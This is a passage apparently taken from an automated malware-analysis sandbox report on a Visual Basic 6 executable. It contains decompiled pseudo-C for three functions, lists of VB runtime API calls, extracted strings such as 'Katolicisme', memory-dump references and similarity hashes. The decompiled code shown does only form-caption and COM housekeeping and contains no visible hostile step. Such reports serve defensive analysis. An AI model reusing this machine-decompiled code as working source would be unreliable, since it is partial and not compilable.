					_push(_t127);
					_push(_t180);
					_push(_t106);
					L004012A2();
				}
				_push(L"Version ");
				_push(_v128);
				L0040128A();
				L004012B4();
				_push(_t106);
				L004012AE();
				L004012B4();
				_push(_t106);
				_push(0x412470);
				L004012AE();
				L004012B4();
				_push(_t106);
				_push(_v132);
				L0040128A();
				L004012B4();
				_push(_t106);
				L004012AE();
				L004012B4();
				_push(_t106);
				_push(0x412470);
				L004012AE();
				L004012B4();
				_push(_t106);
				_push(_v136);
				L0040128A();
				L004012B4();
				_push(_t106);
				L004012AE();
				_v100 = _t106;
				_v108 = 8;
				_t128 = L"Caption";
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(_t128);
				_push( &_v52);
				asm("movsd");
				L00401290();
				_push( &_v80);
				_push( &_v76);
				_push( &_v72);
				_push( &_v68);
				_push( &_v64);
				_push( &_v60);
				_push( &_v56);
				_push(7);
				L0040129C();
				_push( &_v92);
				_push( &_v88);
				_push( &_v84);
				_push(3);
				L00401284();
				L0040127E();
				if( *0x416e8c == 0) {
					_push(0x416e8c);
					_push(0x412434);
					L004012A8();
				}
				_t183 =  *0x416e8c; // 0x2aae8cc
				_t119 =  *((intOrPtr*)( *_t183 + 0x14))(_t183,  &_v84);
				asm("fclex");
				if(_t119 < 0) {
					_push(0x14);
					_push(0x412424);
					_push(_t183);
					_push(_t119);
					L004012A2();
				}
				_t120 = _v84;
				_t184 = _t120;
				_t121 =  *((intOrPtr*)( *_t120 + 0x60))(_t120,  &_v56);
				asm("fclex");
				if(_t121 < 0) {
					_push(0x60);
					_push(0x412444);
					_push(_t184);
					_push(_t121);
					L004012A2();
				}
				_v100 = _v56;
				_v108 = 8;
				asm("movsd");
				asm("movsd");
				_v56 = _v56 & 0x00000000;
				_t123 =  &_v36;
				asm("movsd");
				_push(_t128);
				_push(_t123);
				asm("movsd");
				L00401290();
				L00401296();
				L0040127E();
				_push(0x414202);
				L0040127E();
				L0040127E();
				return _t123;
			}

0x00413de9
0x00413df4
0x00413df5
0x00413e05
0x00413e08
0x00413e11
0x00413e17
0x00413e1a
0x00413e1d
0x00413e20
0x00413e23
0x00413e26
0x00413e29
0x00413e2c
0x00413e2f
0x00413e32
0x00413e35
0x00413e38
0x00413e3b
0x00413e3e
0x00413e41
0x00413e44
0x00413e4a
0x00413e4c
0x00413e51
0x00413e56
0x00413e56
0x00413e5b
0x00413e68
0x00413e6d
0x00413e6f
0x00413e82
0x00413e71
0x00413e71
0x00413e76
0x00413e78
0x00413e79
0x00413e7a
0x00413e7b
0x00413e7b
0x00413e87
0x00413e91
0x00413e93
0x00413e98
0x00413e9a
0x00413e9c
0x00413e9e
0x00413ea3
0x00413ea4
0x00413ea5
0x00413ea5
0x00413eaa
0x00413eb7
0x00413ec1
0x00413ec8
0x00413ecd
0x00413ecf
0x00413ed1
0x00413ed3
0x00413ed8
0x00413ed9
0x00413eda
0x00413eda
0x00413ee2
0x00413ee6
0x00413ee7
0x00413ee9
0x00413ef4
0x00413f00
0x00413f02
0x00413f07
0x00413f0c
0x00413f0c
0x00413f11
0x00413f1e
0x00413f23
0x00413f25
0x00413f27
0x00413f29
0x00413f2a
0x00413f2b
0x00413f2c
0x00413f2c
0x00413f31
0x00413f3b
0x00413f3d
0x00413f45
0x00413f47
0x00413f5d
0x00413f49
0x00413f49
0x00413f4e
0x00413f53
0x00413f54
0x00413f55
0x00413f56
0x00413f56
0x00413f69
0x00413f6b
0x00413f70
0x00413f75
0x00413f75
0x00413f7a
0x00413f87
0x00413f8c
0x00413f8e
0x00413f90
0x00413f92
0x00413f93
0x00413f94
0x00413f95
0x00413f95
0x00413f9a
0x00413fa4
0x00413fa6
0x00413fae
0x00413fb0
0x00413fb2
0x00413fb7
0x00413fb8
0x00413fb9
0x00413fba
0x00413fba
0x00413fc6
0x00413fc8
0x00413fcd
0x00413fd2
0x00413fd2
0x00413fd7
0x00413fe4
0x00413fe9
0x00413feb
0x00413fed
0x00413fef
0x00413ff0
0x00413ff1
0x00413ff2
0x00413ff2
0x00413ff7
0x00414004
0x00414006
0x0041400e
0x00414010
0x00414012
0x00414017
0x00414018
0x00414019
0x0041401a
0x0041401a
0x0041401f
0x00414024
0x00414027
0x00414031
0x00414036
0x00414037
0x00414041
0x0041404b
0x0041404c
0x0041404d
0x00414057
0x0041405c
0x0041405d
0x00414060
0x0041406a
0x0041406f
0x00414070
0x0041407a
0x0041407f
0x00414080
0x00414081
0x0041408b
0x00414090
0x00414091
0x00414097
0x004140a1
0x004140a6
0x004140a7
0x004140b4
0x004140b7
0x004140be
0x004140c3
0x004140c4
0x004140c5
0x004140c9
0x004140ca
0x004140cb
0x004140cc
0x004140d4
0x004140d8
0x004140dc
0x004140e0
0x004140e4
0x004140e8
0x004140ec
0x004140ed
0x004140ef
0x004140f7
0x004140fb
0x004140ff
0x00414100
0x00414102
0x0041410d
0x00414119
0x0041411b
0x00414120
0x00414125
0x00414125
0x0041412a
0x00414137
0x0041413c
0x0041413e
0x00414140
0x00414142
0x00414147
0x00414148
0x00414149
0x00414149
0x0041414e
0x00414158
0x0041415a
0x0041415f
0x00414161
0x00414163
0x00414165
0x0041416a
0x0041416b
0x0041416c
0x0041416c
0x0041417c
0x0041417f
0x00414186
0x00414187
0x00414188
0x0041418c
0x0041418f
0x00414190
0x00414191
0x00414192
0x00414193
0x0041419b
0x004141a3
0x004141a8
0x004141f4
0x004141fc
0x00414201

APIs

__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 00413E56
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 00413E7B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,00000060), ref: 00413EA5
__vbaStrCat.MSVBVM60(?,About ), ref: 00413EB7
__vbaStrMove.MSVBVM60(?,About ), ref: 00413EC1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041218C,00000054), ref: 00413EDA
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00413EE9
__vbaFreeObj.MSVBVM60 ref: 00413EF4
__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 00413F0C
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 00413F2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,000000B8), ref: 00413F56
__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 00413F75
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 00413F95
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,000000C0), ref: 00413FBA
__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 00413FD2
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 00413FF2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,000000C8), ref: 0041401A
__vbaStrI2.MSVBVM60(?,Version ), ref: 00414027
__vbaStrMove.MSVBVM60(?,Version ), ref: 00414031
__vbaStrCat.MSVBVM60(00000000,?,Version ), ref: 00414037
__vbaStrMove.MSVBVM60(00000000,?,Version ), ref: 00414041
__vbaStrCat.MSVBVM60(00412470,00000000,00000000,?,Version ), ref: 0041404D
__vbaStrMove.MSVBVM60(00412470,00000000,00000000,?,Version ), ref: 00414057
__vbaStrI2.MSVBVM60(?,00000000,00412470,00000000,00000000,?,Version ), ref: 00414060
__vbaStrMove.MSVBVM60(?,00000000,00412470,00000000,00000000,?,Version ), ref: 0041406A
__vbaStrCat.MSVBVM60(00000000,?,00000000,00412470,00000000,00000000,?,Version ), ref: 00414070
__vbaStrMove.MSVBVM60(00000000,?,00000000,00412470,00000000,00000000,?,Version ), ref: 0041407A
__vbaStrCat.MSVBVM60(00412470,00000000,00000000,?,00000000,00412470,00000000,00000000,?,Version ), ref: 00414081
__vbaStrMove.MSVBVM60(00412470,00000000,00000000,?,00000000,00412470,00000000,00000000,?,Version ), ref: 0041408B
__vbaStrI2.MSVBVM60(?,00000000,00412470,00000000,00000000,?,00000000,00412470,00000000,00000000,?,Version ), ref: 00414097
__vbaStrMove.MSVBVM60(?,00000000,00412470,00000000,00000000,?,00000000,00412470,00000000,00000000,?,Version ), ref: 004140A1
__vbaStrCat.MSVBVM60(00000000,?,00000000,00412470,00000000,00000000,?,00000000,00412470,00000000,00000000,?,Version ), ref: 004140A7
__vbaVarLateMemSt.MSVBVM60(?,Caption,00000000,00000000,?,Version ), ref: 004140CC
__vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,Caption,00000000,00000000,?,Version ), ref: 004140EF
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,00000007,?,?,?,?,?,?,?,?,Caption,00000000,00000000), ref: 00414102
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Caption,00000000,00000000,?,Version ), ref: 0041410D
__vbaNew2.MSVBVM60(00412434,00416E8C,?,?,?,?,?,?,?,?,?,?,?,Caption,00000000,00000000), ref: 00414125
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014,?,?,?,?,?,?,?,?,?,?,?,Caption), ref: 00414149
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,00000060,?,?,?,?,?,?,?,?,?,?,?,Caption), ref: 0041416C
__vbaVarLateMemSt.MSVBVM60(?,Caption), ref: 00414193
__vbaFreeObj.MSVBVM60(?,Caption), ref: 0041419B
__vbaFreeVar.MSVBVM60(?,Caption), ref: 004141A3
__vbaFreeVar.MSVBVM60(00414202,?,Caption), ref: 004141F4
__vbaFreeVar.MSVBVM60(00414202,?,Caption), ref: 004141FC

Strings

Version , xrefs: 0041401F
About , xrefs: 00413EAD
Caption, xrefs: 004140BE, 004140C9, 00414190

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$Move$New2$List$Late
String ID: About $Caption$Version
API String ID: 2652319797-2818086185
Opcode ID: 3f6f992f3782178f7c20f4d4e536afe31beceb18b051ad747558817701aa0cda
Instruction ID: f8908b7894d7c1136c542b04f141fc5c0c0c2e88c380b60d0636bc2e81845fd4
Opcode Fuzzy Hash: 3f6f992f3782178f7c20f4d4e536afe31beceb18b051ad747558817701aa0cda
Instruction Fuzzy Hash: 36C16A71E00218ABDB10EFA6CD85EDE7BBCEF05708F50416EB405F71A2DA789945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00414827, Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 273
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00414827(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				long long _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				char* _v128;
				char _v136;
				char _v188;
				char _v192;
				signed int _t86;
				char _t89;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				void* _t102;
				intOrPtr* _t103;
				void* _t104;
				intOrPtr* _t105;
				intOrPtr* _t107;
				void* _t109;
				intOrPtr* _t150;
				char _t151;
				void* _t157;
				intOrPtr* _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr _t165;
				signed int _t168;
				intOrPtr _t169;
				intOrPtr _t172;

				 *[fs:0x0] = _t165;
				_v12 = _t165 - 0xc8;
				_v8 = 0x401138;
				_t150 = _a4;
				_v24 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v56 = 0;
				_v72 = 0;
				_v88 = 0;
				_v104 = 0;
				_v120 = 0;
				_v136 = 0;
				_v188 = 0;
				_v192 = 0;
				_t86 =  *((intOrPtr*)( *_t150 + 0xb0))(_t150,  &_v192, __edi, __esi, __ebx,  *[fs:0x0], 0x401176, __ecx, __ecx, _t163);
				_t168 = _t86;
				asm("fclex");
				if(_t168 < 0) {
					_push(0xb0);
					_push(0x41218c);
					_push(_t150);
					_push(_t86);
					L004012A2();
				}
				asm("fcomp dword [0x401130]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t168 == 0) {
					_t169 =  *0x416e8c; // 0x2aae8cc
					if(_t169 == 0) {
						_push(0x416e8c);
						_push(0x412434);
						L004012A8();
					}
					_t158 =  *0x416e8c; // 0x2aae8cc
					_t98 =  *((intOrPtr*)( *_t158 + 0x14))(_t158,  &_v56);
					asm("fclex");
					if(_t98 < 0) {
						_push(0x14);
						_push(0x412424);
						_push(_t158);
						_push(_t98);
						L004012A2();
					}
					_t99 = _v56;
					_t159 = _t99;
					_t100 =  *((intOrPtr*)( *_t99 + 0x110))(_t99,  &_v52);
					asm("fclex");
					if(_t100 < 0) {
						_push(0x110);
						_push(0x412444);
						_push(_t159);
						_push(_t100);
						L004012A2();
					}
					_v52 = 0;
					L004012B4();
					L00401296();
					_t172 =  *0x416e8c; // 0x2aae8cc
					if(_t172 == 0) {
						_push(0x416e8c);
						_push(0x412434);
						L004012A8();
					}
					_t160 =  *0x416e8c; // 0x2aae8cc
					_t102 =  *((intOrPtr*)( *_t160 + 0x14))(_t160,  &_v56);
					asm("fclex");
					if(_t102 < 0) {
						_push(0x14);
						_push(0x412424);
						_push(_t160);
						_push(_t102);
						L004012A2();
					}
					_t103 = _v56;
					_t161 = _t103;
					_t104 =  *((intOrPtr*)( *_t103 + 0xd8))(_t103,  &_v52);
					asm("fclex");
					if(_t104 < 0) {
						_push(0xd8);
						_push(0x412444);
						_push(_t161);
						_push(_t104);
						L004012A2();
					}
					_v52 = 0;
					L004012B4();
					L00401296();
					_t105 =  *0x416010; // 0x737d18
					if(_t105 == 0) {
						_push(0x416010);
						_push(0x412830);
						L004012A8();
						_t105 =  *0x416010; // 0x737d18
					}
					_t107 =  &_v56;
					L0040123C();
					_t162 = _t107;
					_t109 =  *((intOrPtr*)( *_t162 + 0x140))(_t162,  &_v188, _t107,  *((intOrPtr*)( *_t105 + 0x334))(_t105));
					asm("fclex");
					if(_t109 < 0) {
						_push(0x140);
						_push(0x412498);
						_push(_t162);
						_push(_t109);
						L004012A2();
					}
					_t86 =  *((intOrPtr*)( *_t150 + 0x254))(_t150, _v188);
					asm("fclex");
					if(_t86 < 0) {
						_push(0x254);
						_push(0x41218c);
						_push(_t150);
						_push(_t86);
						L004012A2();
					}
					L00401296();
				}
				L00401224();
				_push(_v48);
				L00401218();
				L004012B4();
				_push(_t86);
				_push(0x4124e4);
				L0040121E();
				asm("sbb esi, esi");
				L00401266();
				if( ~( ~( ~_t86)) != 0) {
					_t151 = 2;
					_v64 = 0x17;
					_v72 = _t151;
					_t157 = 0xfffffffe;
					_push(_t157);
					_push(_t157);
					_push(_t157);
					_push(0xffffffff);
					_push( &_v72);
					L00401212();
					L004012B4();
					L0040127E();
					_push(_t157);
					_push(_t157);
					_push(_t157);
					_push(0xffffffff);
					_push( &_v72);
					_v64 = 0;
					_v72 = _t151;
					L0040120C();
					L004012B4();
					L0040127E();
					_v112 = 0x80020004;
					_t89 = 0xa;
					_v96 = 0x80020004;
					_v80 = 0x80020004;
					_v120 = _t89;
					_v104 = _t89;
					_v88 = _t89;
					_v128 = L"Katolicisme";
					_v136 = 8;
					L00401206();
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push(0);
					_push( &_v72);
					L0040122A();
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_t86 =  &_v72;
					_push(_t86);
					_push(4);
					L00401260();
				}
				asm("wait");
				_push(0x414baa);
				_v32 =  *0x401128;
				L00401266();
				L00401266();
				L00401266();
				L00401266();
				L00401266();
				return _t86;
			}

0x00414838
0x00414848
0x0041484b
0x00414852
0x00414861
0x00414864
0x00414867
0x0041486a
0x0041486d
0x00414870
0x00414873
0x00414876
0x00414879
0x0041487c
0x0041487f
0x00414882
0x00414888
0x0041488e
0x00414894
0x0041489a
0x0041489c
0x0041489e
0x004148a0
0x004148a5
0x004148aa
0x004148ab
0x004148ac
0x004148ac
0x004148b7
0x004148bd
0x004148bf
0x004148c0
0x004148c6
0x004148cc
0x004148ce
0x004148d3
0x004148d8
0x004148d8
0x004148dd
0x004148ea
0x004148ef
0x004148f1
0x004148f3
0x004148f5
0x004148fa
0x004148fb
0x004148fc
0x004148fc
0x00414901
0x0041490b
0x0041490d
0x00414915
0x00414917
0x00414919
0x0041491e
0x00414923
0x00414924
0x00414925
0x00414925
0x00414930
0x00414933
0x0041493b
0x00414940
0x00414946
0x00414948
0x0041494d
0x00414952
0x00414952
0x00414957
0x00414964
0x00414969
0x0041496b
0x0041496d
0x0041496f
0x00414974
0x00414975
0x00414976
0x00414976
0x0041497b
0x00414985
0x00414987
0x0041498f
0x00414991
0x00414993
0x00414998
0x0041499d
0x0041499e
0x0041499f
0x0041499f
0x004149aa
0x004149ad
0x004149b5
0x004149ba
0x004149c1
0x004149c3
0x004149c8
0x004149cd
0x004149d2
0x004149d2
0x004149e1
0x004149e5
0x004149ea
0x004149f6
0x004149fe
0x00414a00
0x00414a02
0x00414a07
0x00414a0c
0x00414a0d
0x00414a0e
0x00414a0e
0x00414a1c
0x00414a24
0x00414a26
0x00414a28
0x00414a2d
0x00414a32
0x00414a33
0x00414a34
0x00414a34
0x00414a3c
0x00414a3c
0x00414a49
0x00414a4e
0x00414a51
0x00414a5b
0x00414a60
0x00414a61
0x00414a66
0x00414a72
0x00414a78
0x00414a80
0x00414a8b
0x00414a8c
0x00414a95
0x00414a98
0x00414a99
0x00414a9a
0x00414a9b
0x00414a9c
0x00414a9e
0x00414a9f
0x00414aa9
0x00414ab1
0x00414ab6
0x00414ab7
0x00414ab8
0x00414abc
0x00414abe
0x00414abf
0x00414ac2
0x00414ac5
0x00414acf
0x00414ad7
0x00414ae3
0x00414ae6
0x00414ae7
0x00414aea
0x00414af6
0x00414af9
0x00414afc
0x00414aff
0x00414b06
0x00414b10
0x00414b18
0x00414b1c
0x00414b20
0x00414b24
0x00414b25
0x00414b26
0x00414b2e
0x00414b32
0x00414b36
0x00414b37
0x00414b3a
0x00414b3b
0x00414b3d
0x00414b42
0x00414b4b
0x00414b4c
0x00414b51
0x00414b84
0x00414b8c
0x00414b94
0x00414b9c
0x00414ba4
0x00414ba9

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,?,0041218C,000000B0), ref: 004148AC
__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 004148D8
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 004148FC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,00000110), ref: 00414925
__vbaStrMove.MSVBVM60(00000000,?,00412444,00000110), ref: 00414933
__vbaFreeObj.MSVBVM60(00000000,?,00412444,00000110), ref: 0041493B
__vbaNew2.MSVBVM60(00412434,00416E8C), ref: 00414952
__vbaHresultCheckObj.MSVBVM60(00000000,02AAE8CC,00412424,00000014), ref: 00414976
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412444,000000D8), ref: 0041499F
__vbaStrMove.MSVBVM60(00000000,?,00412444,000000D8), ref: 004149AD
__vbaFreeObj.MSVBVM60(00000000,?,00412444,000000D8), ref: 004149B5
__vbaNew2.MSVBVM60(00412830,00416010), ref: 004149CD
__vbaObjSet.MSVBVM60(?,00000000), ref: 004149E5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412498,00000140), ref: 00414A0E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041218C,00000254), ref: 00414A34
__vbaFreeObj.MSVBVM60(00000000,?,0041218C,00000254), ref: 00414A3C
__vbaStrCopy.MSVBVM60 ref: 00414A49
#523.MSVBVM60(?), ref: 00414A51
__vbaStrMove.MSVBVM60(?), ref: 00414A5B
__vbaStrCmp.MSVBVM60(004124E4,00000000,?), ref: 00414A66
__vbaFreeStr.MSVBVM60(004124E4,00000000,?), ref: 00414A78
#702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,004124E4,00000000,?), ref: 00414A9F
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,004124E4,00000000,?), ref: 00414AA9
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,004124E4,00000000,?), ref: 00414AB1
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,?,000000FF,000000FE,000000FE,000000FE,004124E4,00000000,?), ref: 00414AC5
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,?,000000FF,000000FE,000000FE,000000FE,004124E4,00000000,?), ref: 00414ACF
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,?,000000FF,000000FE,000000FE,000000FE,004124E4,00000000,?), ref: 00414AD7
__vbaVarDup.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE,?,000000FF,000000FE,000000FE,000000FE,004124E4,00000000,?), ref: 00414B10
#595.MSVBVM60(?,00000000,?,?,?,?,000000FF,000000FE,000000FE,000000FE,?,000000FF,000000FE,000000FE,000000FE,004124E4), ref: 00414B26
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,?,?,?,000000FF,000000FE,000000FE,000000FE,?), ref: 00414B3D
__vbaFreeStr.MSVBVM60(00414BAA,004124E4,00000000,?), ref: 00414B84
__vbaFreeStr.MSVBVM60(00414BAA,004124E4,00000000,?), ref: 00414B8C
__vbaFreeStr.MSVBVM60(00414BAA,004124E4,00000000,?), ref: 00414B94
__vbaFreeStr.MSVBVM60(00414BAA,004124E4,00000000,?), ref: 00414B9C
__vbaFreeStr.MSVBVM60(00414BAA,004124E4,00000000,?), ref: 00414BA4

Strings

Katolicisme, xrefs: 00414AFF

Memory Dump Source

Source File: 00000000.00000002.765267509.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.765249799.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765369208.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765390928.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$#523#595#702#704CopyList
String ID: Katolicisme
API String ID: 3461903032-1143143396
Opcode ID: 541b77b5d7d5668a7154bdf937cd6dfe903d048f62f5c7c45835c2206a24f5a0
Instruction ID: 4b633119e79b234129f870b0462f4ecb1160a2595a559d1cd58dd425df7c8d87
Opcode Fuzzy Hash: 541b77b5d7d5668a7154bdf937cd6dfe903d048f62f5c7c45835c2206a24f5a0
Instruction Fuzzy Hash: 99A12B70900219ABCB14EFA6CD85EDEB7B8AF48704F60416EF105F71A1DB785A49CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00414DF6, Relevance: 30.2, APIs: 20, Instructions: 209
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00414DF6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v36;
				char _v40;
				signed int _v48;
				char _v56;
				signed int _v64;
				char _v72;
				signed int _v80;
				char _v88;
				signed int _v96;
				char _v104;
				char _v156;
				char _v160;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				intOrPtr* _t71;
				intOrPtr* _t73;
				void* _t75;
				void* _t78;
				intOrPtr* _t79;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				void* _t85;
				signed int _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t117;
				intOrPtr* _t118;
				intOrPtr* _t120;
				char _t121;
				intOrPtr* _t122;
				void* _t123;
				void* _t125;
				intOrPtr _t126;
				void* _t129;
				void* _t134;

				_t126 = _t125 - 0xc;
				 *[fs:0x0] = _t126;
				_v16 = _t126 - 0xa8;
				_v12 = 0x401158;
				_t96 = 0;
				_v8 = 0;
				_t62 = _a4;
				 *((intOrPtr*)( *_t62 + 4))(_t62, __edi, __esi, __ebx,  *[fs:0x0], 0x401176, _t123);
				_t129 =  *0x416e8c - _t96; // 0x2aae8cc
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v72 = 0;
				_v88 = 0;
				_v104 = 0;
				_v156 = 0;
				_v160 = 0;
				if(_t129 == 0) {
					_push(0x416e8c);
					_push(0x412434);
					L004012A8();
				}
				_t117 =  *0x416e8c; // 0x2aae8cc
				_t65 =  *((intOrPtr*)( *_t117 + 0x14))(_t117,  &_v40);
				asm("fclex");
				if(_t65 < _t96) {
					_push(0x14);
					_push(0x412424);
					_push(_t117);
					_push(_t65);
					L004012A2();
				}
				_t66 = _v40;
				_t118 = _t66;
				_t67 =  *((intOrPtr*)( *_t66 + 0x128))(_t66,  &_v160);
				asm("fclex");
				if(_t67 < _t96) {
					_push(0x128);
					_push(0x412444);
					_push(_t118);
					_push(_t67);
					L004012A2();
				}
				L00401296();
				if( ~(0 | _v160 == _t96) != _t96) {
					_t121 = 0xa;
					_push( &_v56);
					_v48 = 0x80020004;
					_v56 = _t121;
					L00401200();
					L0040127E();
					_t134 =  *0x416e8c - _t96; // 0x2aae8cc
					if(_t134 == 0) {
						_push(0x416e8c);
						_push(0x412434);
						L004012A8();
					}
					_t97 =  *0x416e8c; // 0x2aae8cc
					_t78 =  *((intOrPtr*)( *_t97 + 0x14))(_t97,  &_v40);
					asm("fclex");
					if(_t78 < 0) {
						_push(0x14);
						_push(0x412424);
						_push(_t97);
						_push(_t78);
						L004012A2();
					}
					_t79 = _v40;
					_t98 = _t79;
					_t80 =  *((intOrPtr*)( *_t79 + 0x78))(_t79,  &_v156);
					asm("fclex");
					if(_t80 < 0) {
						_push(0x78);
						_push(0x412444);
						_push(_t98);
						_push(_t80);
						L004012A2();
					}
					L00401296();
					_t81 =  *0x416010; // 0x737d18
					_v96 = 0x80020004;
					_v104 = _t121;
					_v80 = 0x80020004;
					_v88 = _t121;
					_v64 = 0x80020004;
					_v72 = _t121;
					if(_t81 == 0) {
						_push(0x416010);
						_push(0x412830);
						L004012A8();
						_t81 =  *0x416010; // 0x737d18
					}
					_t83 =  &_v40;
					L0040123C();
					_t122 = _t83;
					_t85 =  *((intOrPtr*)( *_t122 + 0x48))(_t122,  &_v36, _t83,  *((intOrPtr*)( *_t81 + 0x2fc))(_t81));
					asm("fclex");
					if(_t85 < 0) {
						_push(0x48);
						_push(0x412504);
						_push(_t122);
						_push(_t85);
						L004012A2();
					}
					_v36 = _v36 & 0x00000000;
					_v48 = _v36;
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push(0);
					_push( &_v56);
					_v56 = 8;
					L0040122A();
					L00401296();
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					_push(4);
					L00401260();
					_t96 = 0;
				}
				_t71 =  *0x416010; // 0x737d18
				if(_t71 == _t96) {
					_push(0x416010);
					_push(0x412830);
					L004012A8();
					_t71 =  *0x416010; // 0x737d18
				}
				_t73 =  &_v40;
				L0040123C();
				_t120 = _t73;
				_t75 =  *((intOrPtr*)( *_t120 + 0x1a8))(_t120, _t73,  *((intOrPtr*)( *_t71 + 0x32c))(_t71));
				asm("fclex");
				if(_t75 < _t96) {
					_push(0x1a8);
					_push(0x412498);
					_push(_t120);
					_push(_t75);
					L004012A2();
				}
				L00401296();
				_push(0x415098);
				return _t75;
			}

0x00414df9
0x00414e08
0x00414e18
0x00414e1b
0x00414e22
0x00414e24
0x00414e27
0x00414e2d
0x00414e30
0x00414e36
0x00414e39
0x00414e3c
0x00414e3f
0x00414e42
0x00414e45
0x00414e48
0x00414e4e
0x00414e54
0x00414e56
0x00414e5b
0x00414e60
0x00414e60
0x00414e65
0x00414e72
0x00414e77
0x00414e79
0x00414e7b
0x00414e7d
0x00414e82
0x00414e83
0x00414e84
0x00414e84
0x00414e89
0x00414e96
0x00414e98
0x00414ea0
0x00414ea2
0x00414ea4
0x00414ea9
0x00414eae
0x00414eaf
0x00414eb0
0x00414eb0
0x00414ec7
0x00414ecf
0x00414eda
0x00414ee0
0x00414ee1
0x00414ee4
0x00414ee7
0x00414eef
0x00414ef4
0x00414efa
0x00414efc
0x00414f01
0x00414f06
0x00414f06
0x00414f0b
0x00414f18
0x00414f1d
0x00414f1f
0x00414f21
0x00414f23
0x00414f28
0x00414f29
0x00414f2a
0x00414f2a
0x00414f2f
0x00414f3c
0x00414f3e
0x00414f43
0x00414f45
0x00414f47
0x00414f49
0x00414f4e
0x00414f4f
0x00414f50
0x00414f50
0x00414f58
0x00414f5d
0x00414f62
0x00414f67
0x00414f6a
0x00414f6d
0x00414f70
0x00414f73
0x00414f76
0x00414f78
0x00414f7d
0x00414f82
0x00414f87
0x00414f87
0x00414f96
0x00414f9a
0x00414f9f
0x00414fa8
0x00414fad
0x00414faf
0x00414fb1
0x00414fb3
0x00414fb8
0x00414fb9
0x00414fba
0x00414fba
0x00414fc2
0x00414fc6
0x00414fcc
0x00414fd0
0x00414fd4
0x00414fd8
0x00414fda
0x00414fdb
0x00414fe2
0x00414fea
0x00414ff2
0x00414ff6
0x00414ffa
0x00414ffe
0x00414fff
0x00415001
0x00415009
0x00415009
0x0041500b
0x00415012
0x00415014
0x00415019
0x0041501e
0x00415023
0x00415023
0x00415032
0x00415036
0x0041503b
0x00415040
0x00415048
0x0041504a
0x0041504c
0x00415051
0x00415056
0x00415057
0x00415058
0x00415058
0x00415060
